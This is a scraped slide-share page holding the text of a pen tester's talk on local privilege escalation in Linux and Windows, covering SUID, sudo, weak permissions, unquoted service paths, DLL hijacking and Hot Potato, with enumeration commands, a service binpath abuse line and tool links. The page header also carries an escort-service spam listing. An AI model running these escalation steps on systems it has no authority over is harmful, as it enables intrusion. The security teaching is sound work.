Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 

1000 to 0

  • 2. Who am I •Pen tester from Singapore •Started learning about security since 15 and still learning •Want to learn: Reverse Engineering, Kernel Debugging & Exploit 2
  • 3. What I am not talking about •How to use Kernel exploit 3
  • 4. What I am talking •How to find typical misconfigurations made by Sysadmins and Developers •How to capitalize on the misconfigurations to gain super user privileges 4
  • 5. Why am I talking about this? •Running limited shell is not fun •Running kernel exploit is a high risk activity •Kernel exploits are rare •Kernel vulnerabilities usually get patched very quickly 5
  • 7. SUID/SGID •Set User ID Bit / Set Group ID Bit •Enable users to execute file with file owner/group’s permission •Improve security by not assigning permissions for sensitive files to every user -rwsr-xr-x 1 root root 48920 Nov 13 00:58 /usr/bin/passwd 7
  • 8. SUID/SGID What if Buffer Overflow Exists? Command Injection Exists? Interactive Shell Exists? 8
  • 11. SUID/SGID Find all SUID/SGID files find / -perm /u=s,g=s -type f -exec ls -la {} + 2> /dev/null 11
  • 12. sudo •Enable users to run command with privilege of another user •Commonly found in scripts to run privileged commands without password authentication 12
  • 15. sudo 15 VMware vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
  • 16. sudo 16 VMWare vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
  • 17. Weak Folder/File Permission •Reveal sensitive information in history or configuration files •Enable modification of important files or scripts executed by Init or Cron job 17
  • 18. Weak Folder/File Permission •Look out for • Home Directory (.rhosts, .ssh/authorized_keys, .bashrc, .*_history) • Config files (httpd.conf, my.cnf, config.inc.php, sshd.config) • Source codes (.php, .c, .cpp, .pl, .py) • Init (/etc/rc.*) and Cron job (/etc/cron.*/, /var/spool/cron/) • Scripts executed by Init or Cron job 18
  • 20. Weak Folder/File Permission World Readable Files/Folders find / -perm /o+r -exec ls -la {} + 2>/dev/null World Writeable Files/Folder find / -perm /o+w -exec ls -la {} + 2>/dev/null Search for ‘password’ in conf files find / -name *.conf -type f -exec grep -Hn password {} + 2>/dev/null 20
  • 21. PATH •Environment variable for Shell to search for executable •Meant for convenience however could be abused for Relative Path commands 21
  • 22. PATH Assume this is a complex app that allows an authenticated user to view log SUID Enabled 22
  • 25. Symbolic Link Attack •Symbolic link a.k.a soft link points to another file by filename •Able to link any files regardless of the existence of target file •Race Condition •User with write access 25
  • 26. Symbolic Link Attack Cron Job runs this Program to ensure foo is always Writable 26
  • 27. Symbolic Link Attack User has write access for /tmp to create symlink foo User has NO write access to /etc/cron.d/john YET 27
  • 28. Symbolic Link Attack After Cron Job executed the Program User has write access to /etc/cron.d/john 28
  • 29. Symbolic Link Attack Source: https://packetstormsecurity.com/files/133692/Ubuntu-Security-Notice-USN-2744-1.html 29
  • 30. Linux Enumeration Scripts •LinEnum - http://www.rebootuser.com/?p=1758 •LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py 30
  • 33. Weak Folder/File Permission The vulnerability is due to incorrect installation and permissions settings on binary files during the MSE physical or virtual appliance install procedure. An attacker could exploit this vulnerability by logging into the device and escalating their privileges. A successful exploit could allow the attacker to acquire root-level privileges and take full control of the device. Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151104-privmse 33
  • 34. Weak Folder/File Permission Get list of Services not in System32 for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt Get Permissions for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt Source: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/ 34
  • 35. Weak Service Permission •Well known vulnerability for Windows XP SP1 and Windows 2003 Server •MS06-011 - Upnphost, SCardSvr, SSDPSRV, DnsCache, and DHCP services Source: http://www.fuzzysecurity.com/tutorials/16.html 35
  • 36. Weak Service Permission •sc config upnphost binpath=“ “ Source: http://www.fuzzysecurity.com/tutorials/16.html 36
  • 37. Weak Service Permission Get permissions on Services accesschk.exe –uwcqv “Authenticated Users” * accesschk.exe –uwcqv “Users”|”Everyone”|”Any Other Group” * Source: http://www.fuzzysecurity.com/tutorials/16.html 37
  • 38. Weak Registry Permission •Services registered on the System are stored in the Registry • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices •Weak Registry Permission enables non-privilege user to modify the Service’s configurations 38
  • 39. Unquoted Service Paths DisplayName Name PathName hMailServer hMailServer C:ServerMail ServerhMailServerBinhMailServer.exe RunAsService Mobile Broadband HL Service Mobile Broadband HL Service "C:ProgramDataMobileBrServmbbservice.exe" VMware Tools VMTools "C:Program FilesVMwareVMware Toolsvmtoolsd.exe" 39
  • 40. Unquoted Service Paths •Unquoted Service Paths with Space(s) lead to ambiguous binary executions •Windows will attempt to execute a Path ending with the first space onwards •Number of attempted execution = Number of Space + 1 40
  • 41. Unquoted Service Paths C:Program FilesService Dirbinary name.exe 1) C:Program.exe 2) C:Program FilesService.exe 3) C:Program FilesService Dirbinary.exe 4) C:Program FilesService Dirbinary name.exe 41
  • 42. Unquoted Service Paths •Look out for services installed in C:*Folder* •“Authenticated Users” has Modify Permission for C:*Folder* inherited from C: Permissions (except for folders created by Windows) 42
  • 44. Unquoted Service Paths The hMailServer service is now registered in Windows with a quoted path, to prevent the service from being vulnerable to "Unquoted service path". Unquoted service paths would allow a user with access to the server where hMailServer runs, but with less privileges than hMailServer, to gain the privileges of hMailServer by creating a new executable and placing it in C:ProgramFileshMailServerhMailserver.exe. Not Right! 44
  • 45. Unquoted Service Paths C:ServerMail ServerhmailServerBinhMailServer.exe RunAsService 45
  • 46. Unquoted Service Paths Mail.exe is a reverse shell 46
  • 48. Unquoted Service Paths Find all Unquoted Service Paths wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """ Quick Exploit Use Metasploit - exploit/windows/local/trusted_service_path 48
  • 49. DLL Hijacking •Dynamic Link Libraries (DLL) •Shared Library Concept – allows application to reuse code in DLL •Hijacking happens when an application loads an attacker’s DLL instead of the intended DLL 49
  • 50. DLL Hijacking •Loading non-existent DLL •Loading DLL without fully qualified path 50
  • 51. DLL Hijacking •Windows 32 bits DLL Search Order with SafeDllSearchMode Enabled 1. Directory from which application is loaded 2. Windows 32bit System Directory (C:WindowsSystem32) 3. Windows 16 bits System Directory (C:WindowsSystem) 4. Windows Directory (C:Windows) 5. Current Directory 6. Directories listed in %PATH% 51
  • 52. DLL Hijacking •CVE-2016-2855: Huawei Mobile Broadband HL Service Local Privilege Escalation •The Huawei Mobile Broadband HL Service 22.001.25.00.03 and earlier uses a weak ACL for the MobileBrServ program data directory, which allows local users to gain SYSTEM privileges by modifying VERSION.dll. 52
  • 55. DLL Hijacking Used ExportsToC++ to generate all Export functions from C:WindowsSystem32version.dll 55
  • 59. Windows Enumeration Script/Tool •Windows Privsec Check - https://github.com/pentestmonkey/windows-privesc-check 59
  • 60. Hot Potato •Researched and Developed by Stephen Breen @ FoxGlove Security •Combined 3 vulnerabilities to perform Privilege Escalation •NetBIOS Name Services (NBNS) Spoofing •Web Proxy Auto-Discovery Protocol (WPAD) Man In The Middle Attack •HTTP-> SMB Relay 60
  • 61. NBNS Spoofing •Windows resolves domain name by the order • Local Host File @ C:WindowsSystem32driversetchosts • DNS Cache • DNS Server • Local LMHOST File @ C:WindowsSystem32driversetclmhosts.sam • NetBIOS broadcast •Anyone can respond to the NetBIOS Broadcast ☺ 61
  • 62. WPAD Man in the Middle • WPAD is enabled by default • IE will automatically look up http://WPAD/wpad.dat for proxy settings 62
  • 63. NTLM Authentication •Challenge – Response •3 Types of Messages •Negotiation •Challenge •Authentication 63
  • 64. SMB -> SMB Relay •15 years old SMB Relay/Reflection Attack Attacker MITMed the connection to legitimate SMB Server Legitimate Client (3) Client sends the Attacker the NTLM Challenge (2) Attacker connects to Client SMB service and asks for a NTLM Challenge (1) Client connects to SMB Server and asks for a NTLM Challenge (4) Attacker modifies Client’s Challenge and sends it back to Client as his own for (1) (5) Client receives (1) Challenge, encrypts it using his credential (hash) and sends it back to Attacker (6) Attacker sends back the response he receives and successfully authenticated for (2) 64
  • 65. SMB -> SMB Relay •MS08-068 stops this by preventing relaying back the Challenges Keys from where they were issued – SMB to SMB Relay •Doesn’t stop cross protocol attack HTTP -> SMB Relay ☺ 65
  • 66. HTTP-> SMB Relay •NTLM is part of Integrated Windows Authentication •IE supports Integrated Windows Authentication (NTLM Authentication) •Automatic Logon is enabled by default for Intranet Zone •Localhost is part of Intranet Zone ☺ 66
  • 67. Hot Potato (Windows 7) Steps 1. Start NBNS Spoofing for WPAD and start Web Server on localhost:80 2. Start Windows Defender Update (NT Authority/System) 3. WPAD settings redirect Windows Defender Update to http://localhost/GETHASHES 4. http://localhost/GETHASHES asks for NTLM authentication and connects to localhost SMB to obtain Challenge then forward it to Windows Defender Update 5. Windows Defender Update sends NTLM Response 6. Hot Potato resumes the SMB Authentication with the NTLM Response ☺ 67
  • 69. More stuff •Pass The Hash •Mimikatz – Scraping cleartext credentials in Windows LSASS subsystem memory for logged on users 69
  • 70. Summary •Non-exhaustive list of privilege escalation techniques •More awareness has to be raised for Sysadmin and developers 70
  • 71. Tools • LinEnum - http://www.rebootuser.com/?p=1758 • LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py • Windows-privesc-check - https://github.com/pentestmonkey/windows-privesc-check • Hot Potato - https://github.com/foxglovesec/Potato • Mimikatz - https://github.com/gentilkiwi/mimikatz (Available on Metasploit and Powerspoits) • Powersploits - https://github.com/PowerShellMafia/PowerSploit • PowerOPS (Run Powershell commands without Powershell.exe ) – https://github.com/fdiskyou/PowerOPS 71
  • 72. Reference • http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ • http://www.dankalia.com/tutor/01005/0100501004.htm • http://netsec.ws/?p=309 • http://www.fuzzysecurity.com/tutorials/16.html • https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf • http://toshellandback.com/2015/11/24/ms-priv-esc/ • https://foxglovesecurity.com/2016/01/16/hot-potato/ • https://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf 72